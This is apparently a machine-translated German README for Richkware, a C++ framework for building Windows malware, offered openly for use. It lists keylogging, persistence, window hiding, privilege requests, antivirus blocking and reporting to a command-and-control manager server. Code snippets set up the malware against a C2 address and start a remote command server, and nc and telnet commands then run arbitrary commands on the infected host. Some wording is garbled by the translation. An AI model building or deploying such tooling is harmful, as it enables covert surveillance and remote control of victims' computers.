Richkware

Framework zum Erstellen von Windows Malware, geschrieben in C ++.

Richkware ist eine Bibliothek mit Netzwerk- und Betriebssystemfunktionen, mit der Sie Malware erstellen können. Die Zusammensetzung dieser Funktionen ermöglicht es der Anwendung, Verhaltensweisen zu übernehmen, die sich auf die folgenden Arten von Malware beziehen:

• Virus
• Würmer
• Bot
• Spyware
• Keylogger
• Versicherung

Richkware-Manager-Server: Service für die Verwaltung von Hosts, in denen eine Instanz von Malware vorhanden ist, die mit Richkware Framework entwickelt wurde.

Richkware-Manager-Client: Client von Richkware-Manager-Server , dass es die Liste aller Hosts vom Server erhält und diese Befehle an diese senden kann.

• Server ( network.h ): Modul für die Verwaltung eines Multi-Thread-Servers, mit dem Befehle aus dem Internet (Richkware-Manager-Client oder Konsole) gemäß dem spezifischen Protokoll empfangen werden können.
  • Protokoll ( Protokoll.H ):
    1. Ausführliche Befehlsausführung (ID 1)
    2. (Arbeiten in Arbeit)
• Netzwerk ( network.h ):
  • RawRequest : Senden Sie eine Anfrage an einen Server.
  • UploadInfotorichkwaremanagerServer : Senden Sie Informationen an Richkware-Manager-Server

• Storage ( Storage.h ):

  • Savesion und LoadSession : Speichern Sie den Anwendungszustand (verschlüsselt) in:
    • Registrieren (SaveValuereg und LoadValuereg)
    • Datei (SaveValUetoFile und LoadValueFromFile)
  • Persistenz : Installieren Sie sich dauerhaft im System.

• Isadmin und RequestAdMinPrivileges ( Richkware.H ): Überprüfen und fordern Administratorrechte;

• StealthWindow ( Richkware.H ): Anwendungen ausblenden;

• OpenApp ( Richkware.h ): Open willkürliche Anwendungen;

• Keylogger ( Richkware.h ): speichert in einer Datei alle gedrückten Schlüssel;

• BlockApps E UnBlockapps ( BlockApps.H ): Block- und Entsperranwendungen (Antivirus, ...).

• Verschlüsseln und entschlüsseln ( Crypto.h ): RC4 (Standard), Blowfish.
• Codieren und decodieren ( Crypto.h ): Base64 (Defualt), Hex.

• Randmouse ( Richkware.H ): Zufälliger Mauszeiger bewegen;
• Winterschlaf ( Richkware.h ): Hibernate -System.

Dies sind die Grundanforderungen für die Erstellung und Verwendung von Richkware:

• Machen oder cmake
• Mingw

Öffnen Sie Main.cpp und erstellen Sie eine Instanz von Richkware.

Wenn Sie RMS bereitgestellt haben, können Sie die Malware wie folgt initialisieren:

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

Dass es einen sicheren Schlüssel von Richkware-Manager-Server erhält und der Schlüssel als Verschlüsselungsschlüssel festlegt. Standardpass wird als temporärer Verschlüsselungsschlüssel verwendet, um eine sichere Kommunikation mit RMS zu gewährleisten. Wenn die Malware die RMS nicht erreichen kann, um ihren Verschlüsselungsket zu erhalten, verwendet sie Standardpass als Verschlüsselungsschlüssel.

Andernfalls können Sie, wenn Sie keine RMS bereitgestellt haben, verwenden:

 Richkware richkware("Richk","richktest");

Auf diese Weise verwendet es "Richktest" als Verschlüsselungsschlüssel.

Nach der Implementierung von Main.cpp können Sie wie folgt kompilieren.

 make

• C/C ++> Präprozessor> Vorprozessor -Definitionen fügen Sie "_crt_secure_no_warnings" hinzu.
• Linker> Eingabe> Zusätzliche Abhängigkeiten fügen Sie "WS2_32.LIB" hinzu.

Im folgenden Beispiel nennen wir " Server ", eine Malware, die mit Richkware Framework entwickelt wurde und in der es die Funktion zum Erstellen eines Servers und " Client ", dem Ersteller (Hacker) der Malware, die versucht hat, eine Verbindung mit dem infizierten PC herzustellen, aktiviert wurde.

Aufruf -Framework -Funktion startserver im Hauptanschluss startet den Server auf einem Port. Im folgenden Beispiel befindet sich der TCP -Port 8000. Denken Sie daran, dass Sie diesen Port nicht verwenden können, wenn das Programm gestoppt wird, wenn ein Port bereits von einem anderen Programm verwendet wird.

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

In allen Systemen, in denen der Java-Virtual-Computer installiert ist, können Sie Richkware-Manager-Client verwenden, da es ansonsten nicht vorhanden ist, können Sie problemlos ein Terminal verwenden.

In UNIX -Systemen können Sie NetCat verwenden und den folgenden Befehl ausführen:

 nc <serverName> 8000

Wenn der Server die Anfrage im offenen Port erhalten hat und es gelingt, eine Verbindung zu erstellen, antwortet er auf den Client, der die Aufstellung der Verbindung bestätigt. Danach können Sie schreiben:

 [[1]]COMMAND

Wo Befehl ein Befehl ist, der auf dem infizierten Host ausgeführt werden muss, auf dem der Server ausgeführt wird.

In Windows können Sie Telnet auf die gleiche Weise verwenden:

 telnet <serverName> 8000

...

 [[1]]COMMAND